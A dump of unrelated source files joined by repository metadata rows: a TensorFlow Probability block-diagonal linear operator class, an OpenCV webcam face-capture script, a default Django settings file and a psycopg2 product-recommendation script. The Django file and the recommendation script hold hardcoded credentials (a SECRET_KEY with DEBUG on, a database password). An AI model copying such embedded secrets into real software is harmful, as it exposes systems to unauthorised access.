the [batch] square matrix formed by having each matrix `Aj` on the main
diagonal.
Each `opj` is required to represent a square matrix, and hence will have
shape `batch_shape_j + [M_j, M_j]`.
If `opj` has shape `batch_shape_j + [M_j, M_j]`, then the combined operator
has shape `broadcast_batch_shape + [sum M_j, sum M_j]`, where
`broadcast_batch_shape` is the mutual broadcast of `batch_shape_j`,
`j = 1,...,J`, assuming the intermediate batch shapes broadcast.
Even if the combined shape is well defined, the combined operator's
methods may fail due to lack of broadcasting ability in the defining
operators' methods.
Arguments to `matmul`, `matvec`, `solve`, and `solvevec` may either be single
`Tensor`s or lists of `Tensor`s that are interpreted as blocks. The `j`th
element of a blockwise list of `Tensor`s must have dimensions that match
`opj` for the given method. If a list of blocks is input, then a list of
blocks is returned as well.
```python
# Create a 4 x 4 linear operator combined of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorBlockDiag([operator_1, operator_2])
operator.to_dense()
==> [[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]]
tensor_shape.TensorShape(operator.shape)
==> [4, 4]
operator.log_abs_determinant()
==> scalar Tensor
x1 = ... # Shape [2, 2] Tensor
x2 = ... # Shape [2, 2] Tensor
x = tf.concat([x1, x2], 0) # Shape [2, 4] Tensor
operator.matmul(x)
==> tf.concat([operator_1.matmul(x1), operator_2.matmul(x2)])
# Create a [2, 3] batch of 4 x 4 linear operators.
matrix_44 = tf.random.normal(shape=[2, 3, 4, 4])
operator_44 = LinearOperatorFullMatrix(matrix)
# Create a [1, 3] batch of 5 x 5 linear operators.
matrix_55 = tf.random.normal(shape=[1, 3, 5, 5])
operator_55 = LinearOperatorFullMatrix(matrix_55)
# Combine to create a [2, 3] batch of 9 x 9 operators.
operator_99 = LinearOperatorBlockDiag([operator_44, operator_55])
# Create a shape [2, 3, 9] vector.
x = tf.random.normal(shape=[2, 3, 9])
operator_99.matmul(x)
==> Shape [2, 3, 9] Tensor
# Create a blockwise list of vectors.
x = [tf.random.normal(shape=[2, 3, 4]), tf.random.normal(shape=[2, 3, 5])]
operator_99.matmul(x)
==> [Shape [2, 3, 4] Tensor, Shape [2, 3, 5] Tensor]
```
#### Performance
The performance of `LinearOperatorBlockDiag` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=True,
name=None):
r"""Initialize a `LinearOperatorBlockDiag`.
`LinearOperatorBlockDiag` is initialized with a list of operators
`[op_1,...,op_J]`.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
This is true by default, and will raise a `ValueError` otherwise.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty or are non-square.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Define diagonal operators, for functions that are shared across blockwise
# `LinearOperator` types.
self._diagonal_operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The direct sum of non-singular operators is always non-singular.")
is_non_singular = True
if all(operator.is_self_adjoint for operator in operators):
if is_self_adjoint is False:
raise ValueError(
"The direct sum of self-adjoint operators is always self-adjoint.")
is_self_adjoint = True
if all(operator.is_positive_definite for operator in operators):
if is_positive_definite is False:
raise ValueError(
"The direct sum of positive definite operators is always "
"positive definite.")
is_positive_definite = True
if not (is_square and all(operator.is_square for operator in operators)):
raise ValueError(
"Can only represent a block diagonal of square matrices.")
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
# Using ds to mean direct sum.
name = "_ds_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorBlockDiag, self).__init__(
dtype=dtype,
graph_parents=None,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=True,
name=name)
# TODO(b/143910018) Remove graph_parents in V3.
self._set_graph_parents(graph_parents)
@property
def operators(self):
return self._operators
def _block_range_dimensions(self):
return [op.range_dimension for op in self._diagonal_operators]
def _block_domain_dimensions(self):
return [op.domain_dimension for op in self._diagonal_operators]
def _block_range_dimension_tensors(self):
return [op.range_dimension_tensor() for op in self._diagonal_operators]
def _block_domain_dimension_tensors(self):
return [op.domain_dimension_tensor() for op in self._diagonal_operators]
def _shape(self):
# Get final matrix shape.
domain_dimension = sum(self._block_domain_dimensions())
range_dimension = sum(self._block_range_dimensions())
matrix_shape = tensor_shape.TensorShape([domain_dimension, range_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if tensor_shape.TensorShape(self.shape).is_fully_defined():
return ops.convert_to_tensor(
tensor_shape.TensorShape(self.shape).as_list(), dtype=dtypes.int32, name="shape")
domain_dimension = sum(self._block_domain_dimension_tensors())
range_dimension = sum(self._block_range_dimension_tensors())
matrix_shape = array_ops.stack([domain_dimension, range_dimension])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def matmul(self, x, adjoint=False, adjoint_arg=False, name="matmul"):
"""Transform [batch] matrix `x` with left multiplication: `x --> Ax`.
```python
# Make an operator acting like batch matrix A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
tensor_shape.TensorShape(operator.shape) = [..., M, N]
X = ... # shape [..., N, R], batch matrix, R > 0.
Y = operator.matmul(X)
tensor_shape.TensorShape(Y.shape)
==> [..., M, R]
Y[..., :, r] = sum_j A[..., :, j] X[j, r]
```
Args:
x: `LinearOperator`, `Tensor` with compatible shape and same `dtype` as
`self`, or a blockwise iterable of `LinearOperator`s or `Tensor`s. See
class docstring for definition of shape compatibility.
adjoint: Python `bool`. If `True`, left multiply by the adjoint: `A^H x`.
adjoint_arg: Python `bool`. If `True`, compute `A x^H` where `x^H` is
the hermitian transpose (transposition and complex conjugation).
name: A name for this `Op`.
Returns:
A `LinearOperator` or `Tensor` with shape `[..., M, R]` and same `dtype`
as `self`, or if `x` is blockwise, a list of `Tensor`s with shapes that
concatenate to `[..., M, R]`.
"""
if isinstance(x, linear_operator.LinearOperator):
left_operator = self.adjoint() if adjoint else self
right_operator = x.adjoint() if adjoint_arg else x
if (right_operator.range_dimension is not None and
left_operator.domain_dimension is not None and
right_operator.range_dimension != left_operator.domain_dimension):
raise ValueError(
"Operators are incompatible. Expected `x` to have dimension"
" {} but got {}.".format(
left_operator.domain_dimension, right_operator.range_dimension))
with self._name_scope(name):
return linear_operator_algebra.matmul(left_operator, right_operator)
with self._name_scope(name):
arg_dim = -1 if adjoint_arg else -2
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
if linear_operator_util.arg_is_blockwise(block_dimensions, x, arg_dim):
for i, block in enumerate(x):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[arg_dim])
x[i] = block
else:
x = ops.convert_to_tensor(x, name="x")
# self._check_input_dtype(x)
op_dimension = (self.range_dimension if adjoint
else self.domain_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(x.shape)[arg_dim])
return self._matmul(x, adjoint=adjoint, adjoint_arg=adjoint_arg)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
arg_dim = -1 if adjoint_arg else -2
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
blockwise_arg = linear_operator_util.arg_is_blockwise(
block_dimensions, x, arg_dim)
if blockwise_arg:
split_x = x
else:
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_x = linear_operator_util.split_arg_into_blocks(
self._block_domain_dimensions(),
self._block_domain_dimension_tensors,
x, axis=split_dim)
result_list = []
for index, operator in enumerate(self.operators):
result_list += [operator.matmul(
split_x[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
if blockwise_arg:
return result_list
result_list = linear_operator_util.broadcast_matrix_batch_dims(
result_list)
return array_ops.concat(result_list, axis=-2)
def matvec(self, x, adjoint=False, name="matvec"):
"""Transform [batch] vector `x` with left multiplication: `x --> Ax`.
```python
# Make an operator acting like batch matric A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
X = ... # shape [..., N], batch vector
Y = operator.matvec(X)
tensor_shape.TensorShape(Y.shape)
==> [..., M]
Y[..., :] = sum_j A[..., :, j] X[..., j]
```
Args:
x: `Tensor` with compatible shape and same `dtype` as `self`, or an
iterable of `Tensor`s (for blockwise operators). `Tensor`s are treated
a [batch] vectors, meaning for every set of leading dimensions, the last
dimension defines a vector.
See class docstring for definition of compatibility.
adjoint: Python `bool`. If `True`, left multiply by the adjoint: `A^H x`.
name: A name for this `Op`.
Returns:
A `Tensor` with shape `[..., M]` and same `dtype` as `self`.
"""
with self._name_scope(name):
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
if linear_operator_util.arg_is_blockwise(block_dimensions, x, -1):
for i, block in enumerate(x):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[-1])
x[i] = block
x_mat = [block[..., _ops.newaxis] for block in x]
y_mat = self.matmul(x_mat, adjoint=adjoint)
return [array_ops.squeeze(y, axis=-1) for y in y_mat]
x = ops.convert_to_tensor(x, name="x")
# self._check_input_dtype(x)
op_dimension = (self.range_dimension if adjoint
else self.domain_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(x.shape)[-1])
x_mat = x[..., _ops.newaxis]
y_mat = self.matmul(x_mat, adjoint=adjoint)
return array_ops.squeeze(y_mat, axis=-1)
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
def solve(self, rhs, adjoint=False, adjoint_arg=False, name="solve"):
"""Solve (exact or approx) `R` (batch) systems of equations: `A X = rhs`.
The returned `Tensor` will be close to an exact solution if `A` is well
conditioned. Otherwise closeness will vary. See class docstring for details.
Examples:
```python
# Make an operator acting like batch matrix A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
tensor_shape.TensorShape(operator.shape) = [..., M, N]
# Solve R > 0 linear systems for every member of the batch.
RHS = ... # shape [..., M, R]
X = operator.solve(RHS)
# X[..., :, r] is the solution to the r'th linear system
# sum_j A[..., :, j] X[..., j, r] = RHS[..., :, r]
operator.matmul(X)
==> RHS
```
Args:
rhs: `Tensor` with same `dtype` as this operator and compatible shape,
or a list of `Tensor`s (for blockwise operators). `Tensor`s are treated
like a [batch] matrices meaning for every set of leading dimensions, the
last two dimensions defines a matrix.
See class docstring for definition of compatibility.
adjoint: Python `bool`. If `True`, solve the system involving the adjoint
of this `LinearOperator`: `A^H X = rhs`.
adjoint_arg: Python `bool`. If `True`, solve `A X = rhs^H` where `rhs^H`
is the hermitian transpose (transposition and complex conjugation).
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with shape `[...,N, R]` and same `dtype` as `rhs`.
Raises:
NotImplementedError: If `self.is_non_singular` or `is_square` is False.
"""
if self.is_non_singular is False:
raise NotImplementedError(
"Exact solve not implemented for an operator that is expected to "
"be singular.")
if self.is_square is False:
raise NotImplementedError(
"Exact solve not implemented for an operator that is expected to "
"not be square.")
if isinstance(rhs, linear_operator.LinearOperator):
left_operator = self.adjoint() if adjoint else self
right_operator = rhs.adjoint() if adjoint_arg else rhs
if (right_operator.range_dimension is not None and
left_operator.domain_dimension is not None and
right_operator.range_dimension != left_operator.domain_dimension):
raise ValueError(
"Operators are incompatible. Expected `rhs` to have dimension"
" {} but got {}.".format(
left_operator.domain_dimension, right_operator.range_dimension))
with self._name_scope(name):
return linear_operator_algebra.solve(left_operator, right_operator)
with self._name_scope(name):
block_dimensions = (self._block_domain_dimensions() if adjoint
else self._block_range_dimensions())
arg_dim = -1 if adjoint_arg else -2
blockwise_arg = linear_operator_util.arg_is_blockwise(
block_dimensions, rhs, arg_dim)
if blockwise_arg:
split_rhs = rhs
for i, block in enumerate(split_rhs):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[arg_dim])
split_rhs[i] = block
else:
rhs = ops.convert_to_tensor(rhs, name="rhs")
# self._check_input_dtype(rhs)
op_dimension = (self.domain_dimension if adjoint
else self.range_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(rhs.shape)[arg_dim])
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_rhs = linear_operator_util.split_arg_into_blocks(
self._block_domain_dimensions(),
self._block_domain_dimension_tensors,
rhs, axis=split_dim)
solution_list = []
for index, operator in enumerate(self.operators):
solution_list += [operator.solve(
split_rhs[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
if blockwise_arg:
return solution_list
solution_list = linear_operator_util.broadcast_matrix_batch_dims(
solution_list)
return array_ops.concat(solution_list, axis=-2)
def solvevec(self, rhs, adjoint=False, name="solve"):
"""Solve single equation with best effort: `A X = rhs`.
The returned `Tensor` will be close to an exact solution if `A` is well
conditioned. Otherwise closeness will vary. See class docstring for details.
Examples:
```python
# Make an operator acting like batch matrix A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
tensor_shape.TensorShape(operator.shape) = [..., M, N]
# Solve one linear system for every member of the batch.
RHS = ... # shape [..., M]
X = operator.solvevec(RHS)
# X is the solution to the linear system
# sum_j A[..., :, j] X[..., j] = RHS[..., :]
operator.matvec(X)
==> RHS
```
Args:
rhs: `Tensor` with same `dtype` as this operator, or list of `Tensor`s
(for blockwise operators). `Tensor`s are treated as [batch] vectors,
meaning for every set of leading dimensions, the last dimension defines
a vector. See class docstring for definition of compatibility regarding
batch dimensions.
adjoint: Python `bool`. If `True`, solve the system involving the adjoint
of this `LinearOperator`: `A^H X = rhs`.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with shape `[...,N]` and same `dtype` as `rhs`.
Raises:
NotImplementedError: If `self.is_non_singular` or `is_square` is False.
"""
with self._name_scope(name):
block_dimensions = (self._block_domain_dimensions() if adjoint
else self._block_range_dimensions())
if linear_operator_util.arg_is_blockwise(block_dimensions, rhs, -1):
for i, block in enumerate(rhs):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[-1])
rhs[i] = block
rhs_mat = [array_ops.expand_dims(block, axis=-1) for block in rhs]
solution_mat = self.solve(rhs_mat, adjoint=adjoint)
return [array_ops.squeeze(x, axis=-1) for x in solution_mat]
rhs = ops.convert_to_tensor(rhs, name="rhs")
# self._check_input_dtype(rhs)
op_dimension = (self.domain_dimension if adjoint
else self.range_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(rhs.shape)[-1])
rhs_mat = array_ops.expand_dims(rhs, axis=-1)
solution_mat = self.solve(rhs_mat, adjoint=adjoint)
return array_ops.squeeze(solution_mat, axis=-1)
def _diag_part(self):
diag_list = []
for operator in self.operators:
# Extend the axis for broadcasting.
diag_list += [operator.diag_part()[..., _ops.newaxis]]
diag_list = linear_operator_util.broadcast_matrix_batch_dims(diag_list)
diagonal = array_ops.concat(diag_list, axis=-2)
return array_ops.squeeze(diagonal, axis=-1)
def _trace(self):
result = self.operators[0].trace()
for operator in self.operators[1:]:
result += operator.trace()
return result
def _to_dense(self):
num_cols = 0
rows = []
broadcasted_blocks = [operator.to_dense() for operator in self.operators]
broadcasted_blocks = linear_operator_util.broadcast_matrix_batch_dims(
broadcasted_blocks)
for block in broadcasted_blocks:
batch_row_shape = array_ops.shape(block)[:-1]
zeros_to_pad_before_shape = array_ops.concat(
[batch_row_shape, [num_cols]], axis=-1)
zeros_to_pad_before = array_ops.zeros(
shape=zeros_to_pad_before_shape, dtype=block.dtype)
num_cols += array_ops.shape(block)[-1]
zeros_to_pad_after_shape = array_ops.concat(
[batch_row_shape,
[self.domain_dimension_tensor() - num_cols]], axis=-1)
zeros_to_pad_after = array_ops.zeros(
shape=zeros_to_pad_after_shape, dtype=block.dtype)
rows.append(array_ops.concat(
[zeros_to_pad_before, block, zeros_to_pad_after], axis=-1))
mat = array_ops.concat(rows, axis=-2)
tensorshape_util.set_shape(mat, tensor_shape.TensorShape(self.shape))
return mat
def _assert_non_singular(self):
return control_flow_ops.group([
operator.assert_non_singular() for operator in self.operators])
def _assert_self_adjoint(self):
return control_flow_ops.group([
operator.assert_self_adjoint() for operator in self.operators])
def _assert_positive_definite(self):
return control_flow_ops.group([
operator.assert_positive_definite() for operator in self.operators])
def _eigvals(self):
eig_list = []
for operator in self.operators:
# Extend the axis for broadcasting.
eig_list += [operator.eigvals()[..., _ops.newaxis]]
eig_list = linear_operator_util.broadcast_matrix_batch_dims(eig_list)
eigs = array_ops.concat(eig_list, axis=-2)
return array_ops.squeeze(eigs, axis=-1)
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import linalg_impl as _linalg
from tensorflow_probability.python.internal.backend.numpy import ops as _ops
from tensorflow_probability.python.internal.backend.numpy.gen import tensor_shape
from tensorflow_probability.python.internal.backend.numpy import private
distribution_util = private.LazyLoader(
"distribution_util", globals(),
"tensorflow_probability.python.internal._numpy.distribution_util")
tensorshape_util = private.LazyLoader(
"tensorshape_util", globals(),
"tensorflow_probability.python.internal._numpy.tensorshape_util")
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
18daa4fb284bc101f6bf7689e10db76e2acbb98e | 85ffd3121df98bfcb33de50520fbd1846500033d | /0_training_data_collection.py | 7198d32aa31189ce36ae0858e21a1b903360bdb5 | [] | no_license | Jakksan/BullyhackFall2020 | bd846308d83367edf579a64452fb93734c5146a1 | 0bbc00bd6d19fe3ef9ea1eab70ba2d2630e383bf | refs/heads/master | 2020-12-09T12:48:20.670768 | 2020-01-12T04:26:52 | 2020-01-12T04:26:52 | 233,308,372 | 0 | 0 | null | 2020-01-12T11:04:43 | 2020-01-11T22:53:05 | Python | UTF-8 | Python | false | false | 1,697 | py | import cv2
vid_cam = cv2.VideoCapture(0)
face0_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_default.xml')
face1_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_alt.xml')
face2_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_alt2.xml')
profile_detector = cv2.CascadeClassifier('./dataset/haarcascade_profileface.xml')
face_id = 1
profile_id = 2
frames = 0
count0 = 0
count1 = 0
count2 = 0
count3 = 0
def generate_rectangle(focus, screen, gray_img, id, tuple_color, counter):
count = counter
for (x,y,w,h) in focus:
cv2.rectangle(screen, (x,y), (x+w,y+h), tuple_color, 2)
count += 1
cv2.imwrite("dataset/images/User." + str(id) + '.' + str(count) + ".jpg", cv2.resize(gray_img[y:y+h,x:x+w],dsize=(100,100)))
cv2.imshow('Training...', screen)
return(count)
while(vid_cam.isOpened()):
ret, image_frame = vid_cam.read()
gray = cv2.cvtColor(image_frame, cv2.COLOR_BGR2GRAY)
faces0 = face0_detector.detectMultiScale(gray, 1.3, 5)
faces1 = face1_detector.detectMultiScale(gray, 1.3, 5)
faces2 = face2_detector.detectMultiScale(gray, 1.3, 5)
profiles = profile_detector.detectMultiScale(gray, 1.3, 5)
count0=generate_rectangle(faces0, image_frame, gray, 1, (255,0,0), count0)
count1=generate_rectangle(faces1, image_frame, gray, 2, (0,255,0), count1)
count2=generate_rectangle(faces2, image_frame, gray, 3, (0,0,255), count2)
count3=generate_rectangle(profiles, image_frame, gray,4, (30,200,0), count3)
frames += 1
if cv2.waitKey(100) & 0xFF == ord('q'):
break
elif frames>100:
break
vid_cam.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | Jakksan.noreply@github.com |
c044a87fec98fd4c8f583256862bdd4bcb527320 | 863081639cf34d31a33e8153420d8f9e4cfdb33e | /fmovies/settings.py | 79737b97c590465c2fa32ee392061c43959af829 | [
"MIT"
] | permissive | harisnaeemofficial/fmovies | e674fb284c33377508d879d3a307119cece6a6f2 | 26b9a033db8b6eea7de281b96679b47dc15e303f | refs/heads/master | 2021-06-09T17:32:23.778873 | 2016-11-24T23:28:47 | 2016-11-24T23:28:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,301 | py | """
Django settings for fmovies project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@nko9yvj2ul(wgf^4*4@f)pwy8dkc1oo&hh97fke8u92l#mdn+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'scraper',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fmovies.urls'
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates/')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fmovies.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Lima'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
| [
"piero.marini21@gmail.com"
] | piero.marini21@gmail.com |
455e301e82cb9f97b73824292c3cb9c7ca0d10ae | 0deab564a85fa094158e11f33abc08e72ebd4df3 | /Business rules voor Recommendation Engine.py | 1ef49df966518fa10389155efc989df6052cce03 | [] | no_license | hassoonsy2/Business-rules-voor-Recommendation-Engine | 7c6dfaeb935121212c69df459de7e3e43191c24b | 2ba22874d66ffbcde3403b03b826365fb47ed9b7 | refs/heads/main | 2023-03-24T09:41:47.352535 | 2021-03-18T22:17:46 | 2021-03-18T22:17:46 | 348,071,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,920 | py | import psycopg2
from psycopg2 import Error
def connect():
"""This function is the connection with the postgres db"""
connection = psycopg2.connect(host='localhost', database='huwebshop', user='postgres', password='Xplod_555')
return connection
def disconnect():
"""This function disconnects the program with the postgres db"""
con = connect()
return con.close()
def sql_execute(sql,value):
"""This function executes a query on the Postgres db"""
c = connect()
cur = c.cursor()
cur.execute(sql,value)
def sql_select(sql):
"""This function select values from the tables on the Postgres db"""
c = connect()
cur = c.cursor()
cur.execute(sql)
results = cur.fetchall()
return results
def sql_query(sql):
"""This function executes a query on the Postgres db """
c = connect()
cur = c.cursor()
cur.execute(sql)
def commit():
"""This function will cpmmit a query on the Postgres db """
c = connect()
c.commit()
# >> { Content-Based Filtering } <<<
def select_most_sold_products():
""" This function will Select & count every product from Tabel Orders on the Postgres db """
try:
return sql_select("""SELECT orders.prodid, products.name,
COUNT(*)
FROM orders
INNER JOIN products ON Orders.prodid = products.id
GROUP BY prodid ,products.name
ORDER BY COUNT(*) DESC ; """)
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def best_seller():
"""This function will Create Tabel Best seller on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS Best_seller CASCADE")
sql_query("""CREATE TABLE Best_seller
(prodid VARCHAR PRIMARY KEY,
name VARCHAR,
Counter INTEGER ,
FOREIGN KEY (prodid) REFERENCES products(id));""")
results = select_most_sold_products()
#Right , now we can insert the result into the Tabel
for row in results:
prodid = row[0]
name = row[1]
cont = row[2]
sql_execute("Insert into Best_seller(prodid ,name , Counter ) VALUES (%s , %s, %s)",[prodid,name,cont])
commit()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
print("Content Filtering {Best Seller } is Done ")
best_seller()
def select_most_viewed_products():
""" This function will Select & count every product from Tabel profiles previously viewed on the Postgres db """
try:
return sql_select("""SELECT profiles_previously_viewed.prodid, products.name,
COUNT(*)
FROM profiles_previously_viewed
INNER JOIN products ON profiles_previously_viewed.prodid = products.id
GROUP BY prodid ,products.name
ORDER BY COUNT(*) DESC ; """)
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def most_viwed_products():
"""This function will Create Tabel Most viwed products on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS most_viwed_products CASCADE")
sql_query("""CREATE TABLE most_viwed_products
(prodid VARCHAR PRIMARY KEY,
name VARCHAR,
Counter INTEGER ,
FOREIGN KEY (prodid) REFERENCES products(id));""")
commit()
results = select_most_viewed_products()
#Right , now we can insert the result into the Tabel
for row in results:
prodid = row[0]
name = row[1]
cont = row[2]
sql_execute("Insert into most_viwed_products(prodid ,name , Counter ) VALUES (%s , %s, %s)",[prodid,name,cont])
commit()
except(Exception, psycopg2.DatabaseError) as error:
print(error)
print("Content Filtering {Most viwed products } is Done ")
most_viwed_products()
# >> { Collaborative Filtering } <<<
def select_profiels_types_bouncer_and_browser():
"""This fuction will Select & filter the types of profiels on the Postgres db """
bouncer_list = []
BROWSER_list = []
try:
result = sql_select("""SELECT profiles.id, profiles.segment,profiles_previously_viewed.prodid, products.name
FROM profiles
INNER JOIN profiles_previously_viewed ON profiles.id = profiles_previously_viewed.profid
INNER JOIN products on profiles_previously_viewed.prodid = products.id
GROUP BY profiles.id, profiles.segment ,profiles_previously_viewed.prodid ,products.name ;""")
#We Got More then BOUNCER , BROWSER and BUYER but i fillterd the profiels on that
for row in result:
if row[1] == "BOUNCER" :
# index [1] is The Segment !
bouncer_list.append(row)
continue
elif result[1] == "BROWSER":
BROWSER_list.append(row)
continue
return bouncer_list , BROWSER_list
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def profiels_types_bouncer_and_browser():
""" This function will create Tabels for different types of profiels on the Postgres db """
try:
sql_query("DROP TABLE IF EXISTS profiels_type_browsers CASCADE")
sql_query("DROP TABLE IF EXISTS profiels_type_boucer CASCADE")
#One For BROWSERS types
